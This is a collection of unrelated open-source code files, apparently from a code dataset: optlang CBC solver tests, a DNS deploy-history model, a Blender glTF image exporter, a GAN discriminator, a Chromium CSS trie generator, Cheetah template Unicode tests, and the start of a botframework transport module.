self.assertTrue(var in self.model.variables.values())
self.assertEqual(self.model.variables['12x!!@#5_3'].lb, -666)
self.assertEqual(self.model.variables['12x!!@#5_3'].ub, 666)
repickled = pickle.loads(pickle.dumps(self.model))
var_from_pickle = repickled.variables['12x!!@#5_3']
self.assertTrue('v_' + var_from_pickle.name in [var.name for var in self.model.problem.vars])
@unittest.skip("COIN-OR Cbc doesn't support constraint name change")
def test_change_constraint_name(self):
pass
def test_clone_model_with_lp(self):
self.assertEqual(self.model.configuration.verbosity, 0)
self.model.configuration.verbosity = 3
self.model.optimize()
opt = self.model.objective.value
cloned_model = self.interface.Model.clone(self.model, use_lp=True)
self.assertEqual(cloned_model.configuration.verbosity, 3)
self.assertEqual(len(cloned_model.variables), len(self.model.variables))
for var in self.model.variables:
self.assertTrue(var.name in cloned_model.variables)
var_clone = cloned_model.variables[var.name]
self.assertEqual(var_clone.lb, var.lb)
self.assertEqual(var_clone.ub, var.ub)
self.assertEqual(len(cloned_model.constraints), len(self.model.constraints))
for con in self.model.constraints:
self.assertTrue(con.name in cloned_model.constraints)
con_clone = cloned_model.constraints[con.name]
self.assertEqual(con_clone.lb, con.lb)
self.assertEqual(con_clone.ub, con.ub)
cloned_model.optimize()
self.assertAlmostEqual(cloned_model.objective.value, opt)
def test_clone_small_model_with_lp(self):
x1 = self.interface.Variable('x1', lb=0)
x2 = self.interface.Variable('x2', lb=0)
x3 = self.interface.Variable('x3', lb=0)
# A constraint is constructed from an expression of variables and a lower and/or upper bound (lb and ub).
c1 = self.interface.Constraint(x1 + x2 + x3, ub=100, name='c1')
c2 = self.interface.Constraint(10 * x1 + 4 * x2 + 5 * x3, ub=600, name='c2')
c3 = self.interface.Constraint(2 * x1 + 2 * x2 + 6 * x3, ub=300, name='c3')
# An objective can be formulated
obj = self.interface.Objective(10 * x1 + 6 * x2 + 4 * x3, direction='max')
# Variables, constraints and objective are combined in a Model object, which can subsequently be optimized.
model = self.interface.Model(name='Simple model')
model.objective = obj
model.add([c1, c2, c3])
model.update()
self.assertEqual(model.configuration.verbosity, 0)
model.configuration.verbosity = 3
model.optimize()
opt = model.objective.value
cloned_model = self.interface.Model.clone(model, use_lp=True)
self.assertEqual(cloned_model.configuration.verbosity, 3)
self.assertEqual(len(cloned_model.variables), len(model.variables))
for var in model.variables:
self.assertTrue(var.name in cloned_model.variables)
var_clone = cloned_model.variables[var.name]
self.assertEqual(var_clone.lb, var.lb)
self.assertEqual(var_clone.ub, var.ub)
self.assertEqual(len(cloned_model.constraints), len(model.constraints))
for con in model.constraints:
self.assertTrue(con.name in cloned_model.constraints)
con_clone = cloned_model.constraints[con.name]
self.assertEqual(con_clone.lb, con.lb)
self.assertEqual(con_clone.ub, con.ub)
cloned_model.optimize()
self.assertAlmostEqual(cloned_model.objective.value, opt)
def test_change_of_constraint_is_reflected_in_low_level_solver(self):
x = self.interface.Variable('x', lb=0, ub=1, type='continuous')
y = self.interface.Variable('y', lb=-181133.3, ub=12000., type='continuous')
z = self.interface.Variable('z', lb=0., ub=10., type='continuous')
constr1 = self.interface.Constraint(0.3 * x + 0.4 * y + 66. * z, lb=-100, ub=0., name='test')
self.model.add(constr1)
self.model.update()
self.assertEqual(self.model.problem.constr_by_name('c_test_lower').rhs, 100)
self.assertEqual(self.model.problem.constr_by_name('c_test_upper').rhs, 0)
constr1.lb = -9
constr1.ub = 10
self.assertEqual(self.model.problem.constr_by_name('c_test_lower').rhs, 9)
self.assertEqual(self.model.problem.constr_by_name('c_test_upper').rhs, 10)
self.model.optimize()
constr1.lb = -90
constr1.ub = 100
self.assertEqual(self.model.problem.constr_by_name('c_test_lower').rhs, 90)
self.assertEqual(self.model.problem.constr_by_name('c_test_upper').rhs, 100)
def test_constraint_set_problem_to_None_caches_the_latest_expression_from_solver_instance(self):
x = self.interface.Variable('x', lb=-83.3, ub=1324422.)
y = self.interface.Variable('y', lb=-181133.3, ub=12000.)
constraint = self.interface.Constraint(0.3 * x + 0.4 * y, lb=-100, name='test')
self.model.add(constraint)
z = self.interface.Variable('z', lb=2, ub=5, type='integer')
constraint += 77. * z
self.model.remove(constraint)
self.assertEqual(
(constraint.expression - (0.4 * y + 0.3 * x + 77.0 * z)).expand() - 0, 0
)
self.assertEqual(constraint.lb, -100)
self.assertEqual(constraint.ub, None)
def test_change_of_objective_is_reflected_in_low_level_solver(self):
x = self.interface.Variable('x', lb=-83.3, ub=1324422.)
y = self.interface.Variable('y', lb=-181133.3, ub=12000.)
objective = self.interface.Objective(0.3 * x + 0.4 * y, name='test', direction='max')
self.model.objective = objective
self.model.update()
grb_x = self.model.problem.var_by_name('v_' + x.name)
grb_y = self.model.problem.var_by_name('v_' + y.name)
expected = {grb_x: 0.3, grb_y: 0.4}
self.assertEqual(self.model.problem.objective.expr, expected)
z = self.interface.Variable('z', lb=4, ub=4, type='integer')
self.model.objective += 77. * z
self.model.update()
grb_z = self.model.problem.var_by_name('v_' + z.name)
expected[grb_z] = 77.
self.assertEqual(self.model.problem.objective.expr, expected)
def test_change_variable_bounds(self):
import random
inner_prob = self.model.problem
inner_problem_bounds = [(var.lb, var.ub) for var in inner_prob.vars]
bounds = [(var.lb, var.ub) for var in self.model.variables.values()]
self.assertEqual(bounds, inner_problem_bounds)
for var in self.model.variables.values():
var.ub = random.uniform(var.lb, 1000)
var.lb = random.uniform(-1000, var.ub)
self.model.update()
inner_problem_bounds_new = [(var.lb, var.ub) for var in inner_prob.vars]
bounds_new = [(var.lb, var.ub) for var in self.model.variables.values()]
self.assertNotEqual(bounds, bounds_new)
self.assertNotEqual(inner_problem_bounds, inner_problem_bounds_new)
self.assertEqual(bounds_new, inner_problem_bounds_new)
def test_change_constraint_bounds(self):
constraint = self.model.constraints[0]
value = 42
constraint.ub = value
self.assertEqual(constraint.ub, value)
constraint.lb = value
self.assertEqual(constraint.lb, value)
name = constraint.name
self.assertEqual(self.model.problem.constr_by_name('c_' + name + '_upper').rhs, value)
self.assertEqual(self.model.problem.constr_by_name('c_' + name + '_lower').rhs, -1*value)
def test_initial_objective(self):
self.assertIn('BIOMASS_Ecoli_core_w_GAM', self.model.objective.expression.__str__(), )
self.assertEqual(
(self.model.objective.expression - (
1.0 * self.model.variables.BIOMASS_Ecoli_core_w_GAM -
1.0 * self.model.variables.BIOMASS_Ecoli_core_w_GAM_reverse_712e5)).expand() - 0, 0
)
def test_change_objective(self):
v1, v2 = self.model.variables.values()[0:2]
self.model.objective = self.interface.Objective(1. * v1 + 1. * v2)
self.assertIn(v1.name, str(self.model.objective))
self.assertIn(v2.name, str(self.model.objective))
self.assertTrue(same_ex(self.model.objective._expression, 1.*v1 + 1.*v2))
self.model.objective = self.interface.Objective(v1 + v2)
self.assertIn(v1.name, str(self.model.objective))
self.assertIn(v2.name, str(self.model.objective))
self.assertTrue(same_ex(self.model.objective._expression, 1.*v1 + 1.*v2))
def test_iadd_objective(self):
v2, v3 = self.model.variables.values()[1:3]
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-1.0, 1.0])
self.model.objective += 2. * v2 - 3. * v3
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-3.0, -1.0, 1.0, 2.0])
def test_imul_objective(self):
self.model.objective *= 2.
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-2.0, 2.0])
v2, v3 = self.model.variables.values()[1:3]
self.model.objective += 4. * v2 - 3. * v3
self.model.objective *= 3.
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-9.0, -6.0, 6.0, 12.0])
self.model.objective *= -1
obj_coeff = sorted(self.model.problem.objective.expr.values())
self.assertEqual(obj_coeff, [-12.0, -6.0, 6.0, 9.0])
def test_set_copied_objective(self):
mip_expr= self.model.problem.objective.expr
obj_copy = copy.copy(self.model.objective)
self.model.objective = obj_copy
self.assertEqual(self.model.objective.direction, "max")
self.assertEqual(mip_expr, self.model.problem.objective.expr)
@unittest.skip("CBC-MIP timeout is flaky around 0")
def test_timeout(self):
pass
def test_set_linear_coefficients_objective(self):
self.model.objective.set_linear_coefficients({self.model.variables.BIOMASS_Ecoli_core_w_GAM: 666.})
var = self.model.problem.var_by_name('v_' + self.model.variables.BIOMASS_Ecoli_core_w_GAM.name)
self.assertEqual(self.model.problem.objective.expr[var], 666.)
def test_set_linear_coefficients_constraint(self):
constraint = self.model.constraints[0]
coeff_dict = constraint.expression.as_coefficients_dict()
self.assertEqual(coeff_dict[self.model.variables.GAPD_reverse_459c1], -1.0)
constraint.set_linear_coefficients({self.model.variables.GAPD_reverse_459c1: 666.})
coeff_dict = constraint.expression.as_coefficients_dict()
self.assertEqual(coeff_dict[self.model.variables.GAPD_reverse_459c1], 666.)
def test_coinor_cbc_coefficient_dict(self):
x = self.interface.Variable("x")
c = self.interface.Constraint(2 ** x, lb=0, sloppy=True)
obj = self.interface.Objective(2 ** x, sloppy=True)
model = self.interface.Model()
self.assertRaises(Exception, setattr, model, "objective", obj)
self.assertRaises(Exception, model._add_constraint, c)
c = self.interface.Constraint(0, lb=0)
obj = self.interface.Objective(0)
model.add(c)
model.objective = obj
self.assertEqual(model.optimize(), optlang.interface.OPTIMAL)
@unittest.skip('TODO: fix. Not working correctly')
def test_integer_variable_dual(self):
from functools import partial
model = self.interface.Model()
x = self.interface.Variable("x", lb=0)
y = self.interface.Variable("y", lb=0)
c = self.interface.Constraint(x + y, ub=1)
model.add(c)
model.objective = self.interface.Objective(x)
model.optimize()
self.assertEqual(y.dual, -1)
x.type = "integer"
model.optimize()
# TODO: investigate. abstract test case has y. What should the
# behavior be?
self.assertRaises(ValueError, partial(getattr, x, "dual"))
x.type = "continuous"
model.optimize()
self.assertEqual(y.dual, -1)
self.assertEqual(x.dual, 0)
@unittest.skip('TODO: fix. Not working correctly')
def test_integer_constraint_dual(self):
pass
@unittest.skip('TODO: fix. Not working correctly')
def test_integer_batch_duals(self):
pass
def test_relax_with_knapsack(self):
p = [10, 13, 18, 31, 7, 15]
w = [11, 15, 20, 35, 10, 33]
c, I = 47, range(len(w))
x = [self.interface.Variable(type='binary', name='x{}'.format(i)) for i in I]
obj = self.interface.Objective(sum(p[i] * x[i] for i in I), direction='max')
c1 = self.interface.Constraint(sum(w[i] * x[i] for i in I), ub=c)
model = self.interface.Model(name='knapsack')
model.objective = obj
model.add([c1])
model.configuration.relax = True
status = model.optimize()
self.assertTrue(model.problem.relax)
self.assertEqual(model.status, 'optimal')
self.assertTrue(model.objective.value >= 41.0)
def test_max_nodes_max_solutions_with_knapsack(self):
p = [10, 13, 18, 31, 7, 15]
w = [11, 15, 20, 35, 10, 33]
c, I = 47, range(len(w))
x = [self.interface.Variable(type='binary', name='x{}'.format(i)) for i in I]
obj = self.interface.Objective(sum(p[i] * x[i] for i in I), direction='max')
c1 = self.interface.Constraint(sum(w[i] * x[i] for i in I), ub=c)
model = self.interface.Model(name='knapsack')
model.objective = obj
model.add([c1])
model.configuration.max_nodes = 0
model.configuration.max_solutions = 0
status = model.optimize()
self.assertEqual(model.problem.max_nodes, 0)
self.assertEqual(model.problem.max_solutions, 0)
self.assertEqual(model.status, 'feasible')
model.configuration.max_solutions = 10
status = model.optimize()
self.assertEqual(model.problem.max_solutions, 10)
self.assertEqual(model.status, 'optimal')
def test_threads_cuts_emphasis_with_knapsack(self):
p = [10, 13, 18, 31, 7, 15]
w = [11, 15, 20, 35, 10, 33]
c, I = 47, range(len(w))
x = [self.interface.Variable(type='binary', name='x{}'.format(i)) for i in I]
obj = self.interface.Objective(sum(p[i] * x[i] for i in I), direction='max')
c1 = self.interface.Constraint(sum(w[i] * x[i] for i in I), ub=c)
model = self.interface.Model(name='knapsack')
model.objective = obj
model.add([c1])
model.configuration.threads = -1
model.configuration.cuts = 1
model.configuration.emphasis = 2
status = model.optimize()
self.assertEqual(model.problem.threads, -1)
self.assertEqual(model.problem.cuts, 1)
self.assertEqual(model.problem.emphasis, 2)
self.assertEqual(model.status, 'optimal')
class MIPExamples(unittest.TestCase):
interface = coinor_cbc_interface
def test_constant_objective(self):
x1 = self.interface.Variable('x1', lb=0, ub=5)
c1 = self.interface.Constraint(x1, lb=-10, ub=10, name='c1')
obj = self.interface.Objective(1)
model = self.interface.Model()
model.objective = obj
model.add(c1)
model.optimize()
self.assertEqual(model.status, 'optimal')
self.assertEqual(model.objective.value, 1.0)
def test_knapsack(self):
p = [10, 13, 18, 31, 7, 15]
w = [11, 15, 20, 35, 10, 33]
c, I = 47, range(len(w))
x = [self.interface.Variable(type='binary', name='x{}'.format(i)) for i in I]
obj = self.interface.Objective(sum(p[i] * x[i] for i in I), direction='max')
c1 = self.interface.Constraint(sum(w[i] * x[i] for i in I), ub=c)
model = self.interface.Model(name='knapsack')
model.objective = obj
model.add([c1])
status = model.optimize()
self.assertEqual(model.status, 'optimal')
self.assertEqual(model.objective.value, 41.0)
primal_values = [val for val in model.primal_values.values()]
self.assertEqual(primal_values, [1, 0, 0, 1, 0, 0])
selected = [i for i in I if x[i].primal >= 0.99]
self.assertEqual(selected, [0, 3])
def test_travelling_salesman(self):
from itertools import product
# names of places to visit
places = ['Antwerp', 'Bruges', 'C-Mine', 'Dinant', 'Ghent',
'Grand-Place de Bruxelles', 'Hasselt', 'Leuven',
'Mechelen', 'Mons', 'Montagne de Bueren', 'Namur',
'Remouchamps', 'Waterloo']
# distances in an upper triangular matrix
dists = [[83, 81, 113, 52, 42, 73, 44, 23, 91, 105, 90, 124, 57],
[161, 160, 39, 89, 151, 110, 90, 99, 177, 143, 193, 100],
[90, 125, 82, 13, 57, 71, 123, 38, 72, 59, 82],
[123, 77, 81, 71, 91, 72, 64, 24, 62, 63],
[51, 114, 72, 54, 69, 139, 105, 155, 62],
[70, 25, 22, 52, 90, 56, 105, 16],
[45, 61, 111, 36, 61, 57, 70],
[23, 71, 67, 48, 85, 29],
[74, 89, 69, 107, 36],
[117, 65, 125, 43],
[54, 22, 84],
[60, 44],
[97],
[]]
# number of nodes and list of vertices
n, V = len(dists), set(range(len(dists)))
# distances matrix
c = [[0 if i == j
else dists[i][j-i-1] if j > i
else dists[j][i-j-1]
for j in V] for i in V]
# binary variables indicating if arc (i,j) is used on the route or not
x = [[self.interface.Variable(type='binary', name='x_i={}_j={}_arc'.format(i, j)) for j in V] for i in V]
# continuous variable to prevent subtours: each city will have a
# different sequential id in the planned route except the first one
y = [self.interface.Variable(name='x{}'.format(i)) for i in V]
# objective function: minimize the distance
obj = self.interface.Objective(sum(c[i][j]*x[i][j] for i in V for j in V), direction='min')
# constraint : leave each city only once
cons = []
for i in V:
cons.append(self.interface.Constraint(sum(x[i][j] for j in V - {i}), lb=1, ub=1))
# constraint : enter each city only once
for i in V:
cons.append(self.interface.Constraint(sum(x[j][i] for j in V - {i}), lb=1, ub=1))
# subtour elimination
for (i, j) in product(V - {0}, V - {0}):
if i != j:
cons.append(self.interface.Constraint(y[i] - (n+1)*x[i][j] - y[j], lb=-1*n))
model = self.interface.Model(name='travelling_salesman')
model.objective = obj
model.add(cons)
model.optimize()
self.assertEqual(model.status, 'optimal')
self.assertEqual(model.objective.value, 547.0)
|
dnsdb_common/dal/models/deploy_history.py
|
baiyongjie/open_dnsdb
| 378 |
121874
|
<reponame>baiyongjie/open_dnsdb<filename>dnsdb_common/dal/models/deploy_history.py
# -*- coding: utf-8 -*-
from . import AuditTimeMixin
from .. import db
class DeployHistory(db.Model, AuditTimeMixin):
__tablename__ = 'tb_deploy_history'
id = db.Column(db.Integer, primary_key=True)
rtx_id = db.Column(db.String(50), nullable=False)
deploy_desc = db.Column(db.Text, nullable=False)
state = db.Column(db.String(50), nullable=False)
|
blendergltf/exporters/image.py
|
iamthad/blendergltf
| 343 |
121880
|
<reponame>iamthad/blendergltf<gh_stars>100-1000
import base64
import os
import struct
import zlib
import bpy
from .base import BaseExporter
from .common import (
Buffer,
Reference,
SimpleID,
)
EXT_MAP = {'BMP': 'bmp', 'JPEG': 'jpg', 'PNG': 'png', 'TARGA': 'tga'}
class ImageExporter(BaseExporter):
gltf_key = 'images'
blender_key = 'images'
@classmethod
def check(cls, state, blender_data):
errors = []
if blender_data.size[0] == 0:
errors.append('x dimension is 0')
if blender_data.size[1] == 0:
errors.append('y dimension is 0')
if blender_data.type != 'IMAGE':
errors.append('not an image {}'.format(blender_data.type))
if errors:
err_list = '\n\t'.join(errors)
print(
'Unable to export image {} due to the following errors:\n\t{}'
.format(blender_data.name, err_list)
)
return False
return True
@classmethod
def default(cls, state, blender_data):
return {
'name': blender_data.name,
'uri': ''
}
@classmethod
def image_to_data_uri(cls, image):
width = image.size[0]
height = image.size[1]
buf = bytearray([int(p * 255) for p in image.pixels])
# reverse the vertical line order and add null bytes at the start
width_byte_4 = width * 4
raw_data = b''.join(b'\x00' + buf[span:span + width_byte_4]
for span in range((height - 1) * width_byte_4, -1, - width_byte_4))
def png_pack(png_tag, data):
chunk_head = png_tag + data
return (struct.pack("!I", len(data)) +
chunk_head +
struct.pack("!I", 0xFFFFFFFF & zlib.crc32(chunk_head)))
png_bytes = b''.join([
b'\x89PNG\r\n\x1a\n',
png_pack(b'IHDR', struct.pack("!2I5B", width, height, 8, 6, 0, 0, 0)),
png_pack(b'IDAT', zlib.compress(raw_data, 9)),
png_pack(b'IEND', b'')])
return png_bytes
@classmethod
def export(cls, state, blender_data):
path = ''
data = None
gltf = {'name': blender_data.name}
storage_setting = state['settings']['images_data_storage']
image_packed = blender_data.packed_file is not None
if image_packed and storage_setting in ['COPY', 'REFERENCE']:
if blender_data.file_format in EXT_MAP:
# save the file to the output directory
gltf['uri'] = '.'.join([blender_data.name, EXT_MAP[blender_data.file_format]])
temp = blender_data.filepath
blender_data.filepath = os.path.join(
state['settings']['gltf_output_dir'],
gltf['uri']
)
blender_data.save()
with open(bpy.path.abspath(blender_data.filepath), 'rb') as fin:
data = fin.read()
blender_data.filepath = temp
else:
# convert to png and save
gltf['uri'] = '.'.join([blender_data.name, 'png'])
data = cls.image_to_data_uri(blender_data)
path = os.path.join(state['settings']['gltf_output_dir'], gltf['uri'])
elif storage_setting == 'COPY':
with open(bpy.path.abspath(blender_data.filepath), 'rb') as fin:
data = fin.read()
gltf['uri'] = bpy.path.basename(blender_data.filepath)
path = os.path.join(state['settings']['gltf_output_dir'], gltf['uri'])
elif storage_setting == 'REFERENCE':
gltf['uri'] = blender_data.filepath.replace('//', '')
elif storage_setting == 'EMBED':
png_bytes = cls.image_to_data_uri(blender_data)
gltf['mimeType'] = 'image/png'
if state['settings']['gltf_export_binary']:
buf = Buffer(blender_data.name)
view_key = buf.add_view(len(png_bytes), 0, None)
view = buf.buffer_views[view_key]
view['data'] = png_bytes
pad = 4 - len(png_bytes) % 4
if pad not in [0, 4]:
buf.add_view(pad, 0, None)
gltf['bufferView'] = Reference('bufferViews', view_key, gltf, 'bufferView')
state['references'].append(gltf['bufferView'])
state['buffers'].append(buf)
state['input']['buffers'].append(SimpleID('buffer_' + blender_data.name))
else:
gltf['uri'] = 'data:image/png;base64,' + base64.b64encode(png_bytes).decode()
else:
print(
'Encountered unknown option ({}) for images_data_storage setting'
.format(storage_setting)
)
if path:
state['files'][path] = data
return gltf
|
models/discriminator.py
|
tjtanaa/ml-gsn
| 202 |
121919
|
import math
import torch
import torch.nn as nn
from .layers import ConvLayer2d, ConvResBlock2d, EqualLinear
class DiscriminatorHead(nn.Module):
def __init__(self, in_channel, disc_stddev=False):
super().__init__()
self.disc_stddev = disc_stddev
stddev_dim = 1 if disc_stddev else 0
self.conv_stddev = ConvLayer2d(
in_channel=in_channel + stddev_dim, out_channel=in_channel, kernel_size=3, activate=True
)
self.final_linear = nn.Sequential(
nn.Flatten(),
EqualLinear(in_channel=in_channel * 4 * 4, out_channel=in_channel, activate=True),
EqualLinear(in_channel=in_channel, out_channel=1),
)
def cat_stddev(self, x, stddev_group=4, stddev_feat=1):
perm = torch.randperm(len(x))
inv_perm = torch.argsort(perm)
batch, channel, height, width = x.shape
x = x[perm] # shuffle inputs so that all views in a single trajectory don't get put together
group = min(batch, stddev_group)
stddev = x.view(group, -1, stddev_feat, channel // stddev_feat, height, width)
stddev = torch.sqrt(stddev.var(0, unbiased=False) + 1e-8)
stddev = stddev.mean([2, 3, 4], keepdims=True).squeeze(2)
stddev = stddev.repeat(group, 1, height, width)
stddev = stddev[inv_perm] # reorder inputs
x = x[inv_perm]
out = torch.cat([x, stddev], 1)
return out
def forward(self, x):
if self.disc_stddev:
x = self.cat_stddev(x)
x = self.conv_stddev(x)
out = self.final_linear(x)
return out
class ConvDecoder(nn.Module):
def __init__(self, in_channel, out_channel, in_res, out_res):
super().__init__()
log_size_in = int(math.log(in_res, 2))
log_size_out = int(math.log(out_res, 2))
self.layers = []
in_ch = in_channel
for i in range(log_size_in, log_size_out):
out_ch = in_ch // 2
self.layers.append(
ConvLayer2d(
in_channel=in_ch, out_channel=out_ch, kernel_size=3, upsample=True, bias=True, activate=True
)
)
in_ch = out_ch
self.layers.append(
ConvLayer2d(in_channel=in_ch, out_channel=out_channel, kernel_size=3, bias=True, activate=False)
)
self.layers = nn.Sequential(*self.layers)
def forward(self, x):
return self.layers(x)
class StyleDiscriminator(nn.Module):
def __init__(self, in_channel, in_res, ch_mul=64, ch_max=512, **kwargs):
super().__init__()
log_size_in = int(math.log(in_res, 2))
log_size_out = int(math.log(4, 2))
self.conv_in = ConvLayer2d(in_channel=in_channel, out_channel=ch_mul, kernel_size=3)
# each resblock will half the resolution and double the number of features (until a maximum of ch_max)
self.layers = []
in_channels = ch_mul
for i in range(log_size_in, log_size_out, -1):
out_channels = int(min(in_channels * 2, ch_max))
self.layers.append(ConvResBlock2d(in_channel=in_channels, out_channel=out_channels, downsample=True))
in_channels = out_channels
self.layers = nn.Sequential(*self.layers)
self.disc_out = DiscriminatorHead(in_channel=in_channels, disc_stddev=True)
self.decoder = ConvDecoder(in_channel=in_channels, out_channel=in_channel, in_res=4, out_res=in_res)
def forward(self, x):
x = self.conv_in(x)
x = self.layers(x)
out = self.disc_out(x)
recon = self.decoder(x)
return out, recon
|
third_party/WebKit/Source/build/scripts/make_css_primitive_value_unit_trie.py
|
google-ar/chromium
| 777 |
121941
|
<gh_stars>100-1000
#!/usr/bin/env python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import in_generator
import trie_builder
import template_expander
class UnitTrieWriter(in_generator.Writer):
defaults = {
'unit_type': None
}
def __init__(self, in_file_paths):
super(UnitTrieWriter, self).__init__(in_file_paths)
self._units = {entry['name']: entry['unit_type'] for entry in self.in_file.name_dictionaries}
self._outputs = {
'CSSPrimitiveValueUnitTrie.cpp': self.generate_implementation
}
@template_expander.use_jinja('CSSPrimitiveValueUnitTrie.cpp.tmpl')
def generate_implementation(self):
return {
'length_tries': trie_builder.trie_list_by_str_length(self._units)
}
if __name__ == '__main__':
in_generator.Maker(UnitTrieWriter).main(sys.argv)
|
Cheetah/Tests/Unicode.py
|
yegorich/cheetah3
| 111 |
121966
|
<filename>Cheetah/Tests/Unicode.py
# -*- encoding: utf8 -*-
from glob import glob
import os
from shutil import rmtree
import tempfile
import unittest
from Cheetah.Compiler import Compiler
from Cheetah.Template import Template
from Cheetah import CheetahWrapper
from Cheetah.compat import PY2, unicode, load_module_from_file
class CommandLineTest(unittest.TestCase):
def createAndCompile(self, source):
fd, sourcefile = tempfile.mkstemp()
os.close(fd)
os.remove(sourcefile)
sourcefile = sourcefile.replace('-', '_')
if PY2:
fd = open('%s.tmpl' % sourcefile, 'w')
else:
fd = open('%s.tmpl' % sourcefile, 'w', encoding='utf-8')
fd.write(source)
fd.close()
wrap = CheetahWrapper.CheetahWrapper()
wrap.main(['cheetah', 'compile',
'--encoding=utf-8', '--settings=encoding="utf-8"',
'--quiet', '--nobackup', sourcefile])
module_name = os.path.split(sourcefile)[1]
module = load_module_from_file(
module_name, module_name, sourcefile + '.py')
template = getattr(module, module_name)
os.remove('%s.tmpl' % sourcefile)
for sourcefile_py in glob('%s.py*' % sourcefile): # *.py[co]
os.remove(sourcefile_py)
__pycache__ = os.path.join(os.path.dirname(sourcefile), '__pycache__')
if os.path.exists(__pycache__): # PY3
rmtree(__pycache__)
return template
class JBQ_UTF8_Test1(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""Main file with |$v|
$other""")
otherT = Template.compile(source="Other template with |$v|")
other = otherT()
t.other = other
t.v = u'Unicode String'
t.other.v = u'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test2(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""Main file with |$v|
$other""")
otherT = Template.compile(source="Other template with |$v|")
other = otherT()
t.other = other
t.v = u'Unicode String with eacute é'
t.other.v = u'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test3(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""Main file with |$v|
$other""")
otherT = Template.compile(source="Other template with |$v|")
other = otherT()
t.other = other
t.v = u'Unicode String with eacute é'
t.other.v = u'Unicode String and an eacute é'
assert unicode(t())
class JBQ_UTF8_Test4(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""#encoding utf-8
Main file with |$v| and eacute in the template é""")
t.v = 'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test5(unittest.TestCase):
def runTest(self):
t = Template.compile(source="""#encoding utf-8
Main file with |$v| and eacute in the template é""")
t.v = u'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test6(unittest.TestCase):
def runTest(self):
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
Main file with |$v| and eacute in the template é"""
t = Template.compile(source=source)
t.v = u'Unicode String'
assert unicode(t())
class JBQ_UTF8_Test7(CommandLineTest):
def runTest(self):
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
Main file with |$v| and eacute in the template é"""
template = self.createAndCompile(source)
template.v = u'Unicode String'
assert unicode(template())
class JBQ_UTF8_Test8(CommandLineTest):
def testStaticCompile(self):
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
$someUnicodeString"""
template = self.createAndCompile(source)()
a = unicode(template)
if PY2:
a = a.encode("utf-8")
self.assertEqual("Bébé", a)
def testDynamicCompile(self):
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
$someUnicodeString"""
template = Template(source=source)
a = unicode(template)
if PY2:
a = a.encode("utf-8")
self.assertEqual("Bébé", a)
class EncodeUnicodeCompatTest(unittest.TestCase):
"""
Taken initially from Red Hat's bugzilla #529332
https://bugzilla.redhat.com/show_bug.cgi?id=529332
"""
def runTest(self):
t = Template("""Foo ${var}""", filter='EncodeUnicode')
t.var = u"Text with some non-ascii characters: åäö"
rc = t.respond()
assert isinstance(rc, unicode), \
('Template.respond() should return unicode', rc)
rc = str(t)
assert isinstance(rc, str), \
('Template.__str__() should return a UTF-8 encoded string', rc)
class Unicode_in_SearchList_Test(CommandLineTest):
def test_BasicASCII(self):
source = '''This is $adjective'''
template = self.createAndCompile(source)
assert template and issubclass(template, Template)
template = template(searchList=[{'adjective': u'neat'}])
assert template.respond()
def test_Thai(self):
# The string is something in Thai
source = '''This is $foo $adjective'''
template = self.createAndCompile(source)
assert template and issubclass(template, Template)
template = template(
searchList=[{
'foo': 'bar',
'adjective':
u'\u0e22\u0e34\u0e19\u0e14\u0e35\u0e15'
u'\u0e49\u0e2d\u0e19\u0e23\u0e31\u0e1a'
}])
assert template.respond()
def test_Thai_utf8(self):
utf8 = '\xe0\xb8\xa2\xe0\xb8\xb4\xe0\xb8\x99\xe0' \
'\xb8\x94\xe0\xb8\xb5\xe0\xb8\x95\xe0\xb9\x89\xe0' \
'\xb8\xad\xe0\xb8\x99\xe0\xb8\xa3\xe0\xb8\xb1\xe0\xb8\x9a'
source = '''This is $adjective'''
template = self.createAndCompile(source)
assert template and issubclass(template, Template)
template = template(searchList=[{'adjective': utf8}])
assert template.respond()
class InlineSpanishTest(unittest.TestCase):
def setUp(self):
super(InlineSpanishTest, self).setUp()
self.template = '''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Pagina del vendedor</title>
</head>
<body>
$header
<h2>Bienvenido $nombre.</h2>
<br /><br /><br />
<center>
Usted tiene $numpedidos_noconf <a href="">pedidós</a> sin confirmar.
<br /><br />
Bodega tiene fecha para $numpedidos_bodega <a href="">pedidos</a>.
</center>
</body>
</html>
''' # noqa
if PY2: # In PY3 templates are already unicode
def test_failure(self):
""" Test a template lacking a proper #encoding tag """
self.assertRaises(UnicodeDecodeError, Template, self.template,
searchList=[{'header': '',
'nombre': '',
'numpedidos_bodega': '',
'numpedidos_noconf': ''}])
def test_success(self):
""" Test a template with a proper #encoding tag """
template = '#encoding utf-8\n%s' % self.template
template = Template(template, searchList=[{'header': '',
'nombre': '',
'numpedidos_bodega': '',
'numpedidos_noconf': ''}])
self.assertTrue(unicode(template))
class CompilerTest(unittest.TestCase):
def test_compiler_str(self):
""" Test Compiler.__str__ """
source = """#encoding utf-8
#set $someUnicodeString = u"Bébé"
$someUnicodeString"""
compiler = Compiler(source)
self.assertIsInstance(str(compiler), str)
self.assertEqual(compiler.getModuleEncoding(), 'utf-8')
|
libraries/botframework-streaming/botframework/streaming/transport/web_socket/web_socket_transport.py
|
andreikop/botbuilder-python
| 388 |
121983
|
<gh_stars>100-1000
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import traceback
from typing import List
from botframework.streaming.transport import TransportReceiverBase, TransportSenderBase
from .web_socket import WebSocket
